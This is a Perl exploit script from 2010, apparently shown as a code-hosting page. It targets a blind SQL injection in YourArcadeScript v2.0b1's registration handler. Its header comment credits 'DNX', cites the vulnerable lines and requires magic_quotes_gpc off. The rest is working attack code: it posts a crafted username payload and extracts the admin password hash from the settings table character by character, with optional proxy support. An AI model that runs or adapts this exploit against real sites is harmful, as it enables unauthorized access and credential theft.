112 lines
No EOL
3.1 KiB
Perl
Executable file
112 lines
No EOL
3.1 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
use LWP::UserAgent;
|
|
use HTTP::Request::Common qw(POST);
|
|
use Getopt::Long;
|
|
|
|
# \#'#/
|
|
# (-.-)
|
|
# ------------------oOO---(_)---OOo-----------------
|
|
# | __ __ |
|
|
# | _____/ /_____ ______/ /_ __ ______ ______ |
|
|
# | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
|
|
# | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) |
|
|
# | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ |
|
|
# | Security Research Division /____/ 2o1o |
|
|
# --------------------------------------------------
|
|
# | YourArcadeScript v2.0b1 Blind SQL Injection |
|
|
# --------------------------------------------------
|
|
# [!] Discovered by.: DNX
|
|
# [!] Homepage......: http://starbugs.host.sk
|
|
# [!] Vendor........: http://www.yourarcadescript.com
|
|
# [!] Detected......: 21.05.2010
|
|
# [!] Reported......: 22.05.2010
|
|
# [!] Response......: xx.xx.2010
|
|
#
|
|
# [!] Background....: Our script has features that other scripts have but ours is
|
|
# FREE! YourArcadeScript is a free arcade script, but can be
|
|
# used for pictures, youtube, or other media files.
|
|
#
|
|
# [!] Requirements..: magic_quotes_gpc = Off
|
|
#
|
|
# [!] Bug...........: $_POST["username"] in includes/saveregister.php near line 3
|
|
#
|
|
# 03: $username=$_POST["username"];
|
|
#
|
|
# 11: $res=mysql_query("select * from user where username like '$username'") or die(mysql_error());
|
|
#
|
|
|
|
if(!$ARGV[1])
|
|
{
|
|
print "\n \\#'#/ ";
|
|
print "\n (-.-) ";
|
|
print "\n --------------------oOO---(_)---OOo--------------------";
|
|
print "\n | YourArcadeScript v2.0b1 Blind SQL Injection Exploit |";
|
|
print "\n | coded by DNX |";
|
|
print "\n -------------------------------------------------------";
|
|
print "\n[!] Usage: perl yas.pl [Host] [Path] <Options>";
|
|
print "\n[!] Example: perl yas.pl 127.0.0.1 /yas/";
|
|
print "\n[!] Options:";
|
|
print "\n -p [ip:port] Proxy support";
|
|
print "\n";
|
|
exit;
|
|
}
|
|
|
|
my %options = ();
|
|
GetOptions(\%options, "p=s");
|
|
my $ua = LWP::UserAgent->new();
|
|
my $host = $ARGV[0];
|
|
my $path = $ARGV[1];
|
|
my $target = "http://".$host.$path;
|
|
|
|
if($options{"p"})
|
|
{
|
|
$ua->proxy('http', "http://".$options{"p"});
|
|
}
|
|
|
|
print "[!] Exploiting...\n";
|
|
|
|
go();
|
|
|
|
print "\n[!] Exploit done\n";
|
|
|
|
sub go
|
|
{
|
|
syswrite(STDOUT, "[!] Get Admin Password: ", 24);
|
|
for(my $i = 1; $i <= 32; $i++)
|
|
{
|
|
my $found = 0;
|
|
my $h = 48 ;
|
|
while(!$found && $h <= 102)
|
|
{
|
|
if(exploit($i, $h))
|
|
{
|
|
$found = 1;
|
|
syswrite(STDOUT, chr($h), 1);
|
|
}
|
|
$h++;
|
|
if($h == 58)
|
|
{
|
|
$h = 97;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
sub exploit
|
|
{
|
|
my $i = shift;
|
|
my $h = shift;
|
|
my $url = $target."includes/saveregister.php";
|
|
my $inj = "_#1337#_' or substring((select password FROM settings limit 1),".$i.",1)=CHAR(".$h.")/*";
|
|
my $req = POST $url, [username => $inj];
|
|
my $res = $ua->request($req);
|
|
|
|
if($res->content =~ /Sorry username exists register again/s)
|
|
{
|
|
return 1;
|
|
}
|
|
else
|
|
{
|
|
return 0;
|
|
}
|
|
} |